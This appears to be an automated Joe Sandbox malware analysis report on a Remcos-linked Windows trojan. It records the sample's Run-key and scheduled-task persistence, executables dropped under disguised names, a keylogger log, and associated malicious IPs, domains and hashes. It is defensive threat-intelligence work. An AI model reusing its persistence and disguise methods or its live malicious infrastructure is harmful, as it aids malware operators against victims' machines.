                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1573895
                                                                                                              Start date and time:2024-12-12 17:40:15 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 11m 11s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Run name:Run with higher sleep bypass
                                                                                                              Number of analysed new started processes analysed:7
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:3XSXmrEOw7.exe
                                                                                                              renamed because original name is a hash value
                                                                                                              Original Sample Name:972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.expl.evad.winEXE@6/5@5/4
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 66.7%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 79%
                                                                                                              • Number of executed functions: 185
                                                                                                              • Number of non-executed functions: 131
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target yjfesx.exe, PID 768 because there are no executed function
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • VT rate limit hit for: 3XSXmrEOw7.exe

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              17:41:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLI C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe
                                                                                                              17:41:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLI C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe
                                                                                                              17:41:52Task SchedulerRun new task: yjfesx path: C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                              17:42:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe
                                                                                                              17:42:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              181.131.217.244ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                  sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                    hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                      x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                                                        VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                                                                          ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                              s0tuvMen1D.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                185.166.143.48http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                                                                                                                                • bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
                                                                                                                                178.237.33.50ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • geoplugin.net/json.gp

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                navegacionseguracol24vip.orgpPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                s3-w.us-east-1.amazonaws.compPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 54.231.193.17
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 3.5.25.23
                                                                                                                                ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 3.5.29.178
                                                                                                                                financial_policy_December 10, 2024.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                                • 54.231.205.1
                                                                                                                                https://login.hr-internal.co/27553be9ed867726?l=50Get hashmaliciousUnknownBrowse
                                                                                                                                • 3.5.28.204
                                                                                                                                http://prntbl.concejomunicipaldechinu.gov.coGet hashmaliciousUnknownBrowse
                                                                                                                                • 16.15.193.78
                                                                                                                                https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 54.231.165.145
                                                                                                                                https://auth.ball.comGet hashmaliciousUnknownBrowse
                                                                                                                                • 16.182.101.169
                                                                                                                                https://businessnotice.org/dhl/22450156620/tracking?u=84775-c0bf6be57168918ea5fe039631be6c3a772f4fac11292328fca4a210ba0e8890Get hashmaliciousUnknownBrowse
                                                                                                                                • 52.217.98.132
                                                                                                                                bitbucket.orgpPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.166.143.50
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.166.143.49
                                                                                                                                x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.48
                                                                                                                                ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.50
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.50
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.49
                                                                                                                                https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.50
                                                                                                                                lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                • 185.166.143.50
                                                                                                                                iVH355vnza.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.50
                                                                                                                                geoplugin.netozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                EPMTelecomunicacionesSAESPCOozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                s0tuvMen1D.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                • 181.131.217.244
                                                                                                                                AMAZON-02USozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.166.143.48
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 54.231.193.17
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.166.143.49
                                                                                                                                x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.48
                                                                                                                                ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.50
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.50
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.49
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 18.238.49.124
                                                                                                                                file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                • 45.112.123.126
                                                                                                                                ATOM86-ASATOM86NLozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • 178.237.33.50
                                                                                                                                AMAZON-02USozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.166.143.48
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 54.231.193.17
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 185.166.143.49
                                                                                                                                x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.48
                                                                                                                                ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.50
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.50
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 185.166.143.49
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 18.238.49.124
                                                                                                                                file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                • 45.112.123.126

                                                                                                                                JA3 Fingerprints

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 54.231.203.105
                                                                                                                                • 185.166.143.48
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 54.231.203.105
                                                                                                                                • 185.166.143.48
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                • 54.231.203.105
                                                                                                                                • 185.166.143.48
                                                                                                                                x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 54.231.203.105
                                                                                                                                • 185.166.143.48
                                                                                                                                ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 54.231.203.105
                                                                                                                                • 185.166.143.48
                                                                                                                                pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 54.231.203.105
                                                                                                                                • 185.166.143.48
                                                                                                                                hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 54.231.203.105
                                                                                                                                • 185.166.143.48
                                                                                                                                NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                • 54.231.203.105
                                                                                                                                • 185.166.143.48
                                                                                                                                file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                • 54.231.203.105
                                                                                                                                • 185.166.143.48

                                                                                                                                Dropped Files

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                C:\Users\user\AppData\Local\Temp\yjfesx.exeozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                  pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                    hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                      C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exeozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\ProgramData\fdgfghgfhg\logs.dat

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):488
                                                                                                                                            Entropy (8bit):3.269901406290736
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:6la4oecmla4NbWFe5UlaBlaJbWFe5UlaPjlaDlAbW+:6VlcmVRWqUeaWqUUE+W+
                                                                                                                                            MD5:6342EFFB59AA8777C7CC171F48D8F4A8
                                                                                                                                            SHA1:3D23F407F187EEF2CAC2F2B7FD0CB56DBD032469
                                                                                                                                            SHA-256:742880D5777E14D08B44A36BC7BEB9CBE9510275FEECAB57910B87549A177303
                                                                                                                                            SHA-512:A23CA39BE00E75A90DB6BE0F11644AAAF0474FA2FCC5DE6F80B93F6A87F71E9D0E69C2E038AEC3C1C964BEF393168745436FCD2D548CB67771822B92F9A2F641
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:....[.2.0.2.4./.1.2./.1.2. .1.1.:.4.2.:.1.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.4.2.:.1.5. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.1.2. .1.1.:.4.2.:.2.6. .R.u.n.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.4.2.:.2.7. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.1.2. .1.1.:.4.2.:.3.5. .R.u.n.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.4.2.:.3.9. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):963
                                                                                                                                            Entropy (8bit):5.0088110527764815
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzz:qlupdRNuKyGX85jvXhNlT3/7CcVKWrZ
                                                                                                                                            MD5:BD018C0C5F33B3037C1E9B852C5D9744
                                                                                                                                            SHA1:69225F65C7D5FF12EF0889811B9CB8CE1C1CF0D1
                                                                                                                                            SHA-256:29AE4457FFF6A1B0F04A9EC87B161876887D8E827EF06A443D61D78C6BA9330A
                                                                                                                                            SHA-512:BE6CF8CDC952A9DE6E1F0769934CFC5A07D93C2A2B341083D79D89CDEF6578D0DDF50D8079962DB3490D76A2738EB01678506C2C8B810BDBABFED567D1977BA3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":null,. "geoplugin_currencySymbol_UTF8":"",. "geoplugin_currencyConverter":0.}

                                                                                                                                            C:\Users\user\AppData\Local\Temp\yjfesx.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4054528
                                                                                                                                            Entropy (8bit):6.41931526899004
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:swsFCTOMRebywOIYAXu14+MFL3MrI+rtZg+VRWKldQwsRwRHa0eQkxHodWYPWIRL:Psukx/cRAVyoqjU9sVK+
                                                                                                                                            MD5:27650AFE28BA588C759ADE95BF403833
                                                                                                                                            SHA1:6D3D03096CEE42FC07300FB0946EC878161DF8A5
                                                                                                                                            SHA-256:CA84EC6D70351B003D3CACB9F81BE030CC9DE7AC267CCE718173D4F42CBA2966
                                                                                                                                            SHA-512:767CEB499DDA76E63F9ECEAA2AA2940D377E70A2F1B8E74DE72126977C96B32E151BFF1FB88A3199167E16977B641583F8E8EA0F764A35214F6BC9A2D2814FDC
                                                                                                                                            Malicious:true
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: ozfqy8Ms6t.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: pPLwX9wSrD.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: hCJ8gK9kNn.exe, Detection: malicious, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................. .........H. .......!...@...........................[..................@...........................p=.n5....?.p.....................................................=.....................................................CODE......!....... ................. ..`DATA..........!....... .............@...BSS...........!.......!..................idata...@...p=..6....!.............@....tls..........=.......!..................rdata... ....=.......!.............@..P.rsrc...p.....?.......!.............@..P........................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):979567142
                                                                                                                                            Entropy (8bit):0.05590638890163692
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:599A413EE85CC3A8A223C83230DC8D54
                                                                                                                                            SHA1:5D6E856794B3AF1D96AB0319350856BD5BCE4BE6
                                                                                                                                            SHA-256:CAAB3F404A2CE6D4EFCBFEC97172CBC17D2E4A8D128F4BB42BBE677947DBB425
                                                                                                                                            SHA-512:6EF58AC644BE1B60F2E65851CEF60E81D772212CB9B127613DDB77A941B555868AD3B616B173574D2129AC5F874650D485E520AE62287C939B5581C9E6D0CC32
                                                                                                                                            Malicious:false
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: ozfqy8Ms6t.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: pPLwX9wSrD.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: hCJ8gK9kNn.exe, Detection: malicious, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................. .........H. .......!...@...........................[..................@...........................p=.n5....?.p.....................................................=.....................................................CODE......!....... ................. ..`DATA..........!....... .............@...BSS...........!.......!..................idata...@...p=..6....!.............@....tls..........=.......!..................rdata... ....=.......!.............@..P.rsrc...p.....?.......!.............@..P........................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\3XSXmrEOw7.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):979567344
                                                                                                                                            Entropy (8bit):0.03700901017287011
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B3CAB76A555DCC61A1FC843C15FB855B
                                                                                                                                            SHA1:F83C46C8C39716DA7235DFFDD37E146A8F3F641E
                                                                                                                                            SHA-256:83C5993B56589CA2AE0B06B6F145110E36FC4406AF9CFB8ED23493175BE5467C
                                                                                                                                            SHA-512:85CB1F9A0B932E0E4F27FD8E8F2BBA145ACB357516B7A49DCEE8F021D0FBC6B4590BB141CA2849DE15481B1DDB147C2192B57A448AEC32EC9F56D16D1A334A5A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A..j...9...9...9...9...9...9...9...9...9..9...9...9...9...9...9...9..9...9...9...9<..9...9j..9..9...9...9...9Rich...9................PE..L.....C.................P...`#.....}V.......`....@..........................p*.............................................t........0...="..........................f..................................H............`...............................text....C.......P.................. ..`.rdata.......`.......`..............@..@.data........@...@...@..............@....rsrc....="..0...@".................@..@........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):6.482858818003191
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:3XSXmrEOw7.exe
                                                                                                                                            File size:2'605'056 bytes
                                                                                                                                            MD5:ddce3b9704d1e4236548b1a458317dd0
                                                                                                                                            SHA1:a48a65dbcba5a65d89688e1b4eac0deef65928c8
                                                                                                                                            SHA256:972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce
                                                                                                                                            SHA512:5e99897810377570cc29f0a066d4f31e05790b10d8a479dd8e358477cc7317bccd4d67c5936edfdca5f6385bd0587ba43b626bfc919cb12330facf3fa8893e86
                                                                                                                                            SSDEEP:49152:WWp/hOxsZI6ezrykdIyfQxPhPR+Wa0WY44:bp/3p8r3fQBhPR+WJl
                                                                                                                                            TLSH:5FC54992A2E9C256F5F26A70D932E6F18526BCA5E935850F63D07D1F3431E818932B33
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A..j...9...9...9...9...9...9...9...9...9...9...9...9...9...9...9...9...9...9...9...9<..9...9j..9...9...9...9...9Rich...9.......

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:83b73111292d65c5

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x42567d
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:
                                                                                                                                            Time Stamp:0x43A9E2E6 [Wed Dec 21 23:19:02 2005 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:1b45e9b30691181342689639e3f2a9ef

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            push 00000060h
                                                                                                                                            push 0044C9D0h
                                                                                                                                            inc eax
                                                                                                                                            inc ebx
                                                                                                                                            mov eax, 00000000h
                                                                                                                                            inc eax
                                                                                                                                            add eax, ebx
                                                                                                                                            mov eax, edi
                                                                                                                                            call 00007FB3D0884D34h
                                                                                                                                            mov dword ptr [ebp-18h], esp
                                                                                                                                            mov esi, esp
                                                                                                                                            mov dword ptr [esi], edi
                                                                                                                                            push esi
                                                                                                                                            call dword ptr [004462D4h]
                                                                                                                                            mov ecx, dword ptr [esi+10h]
                                                                                                                                            mov dword ptr [00480954h], ecx
                                                                                                                                            mov eax, dword ptr [esi+04h]
                                                                                                                                            mov dword ptr [00480960h], eax
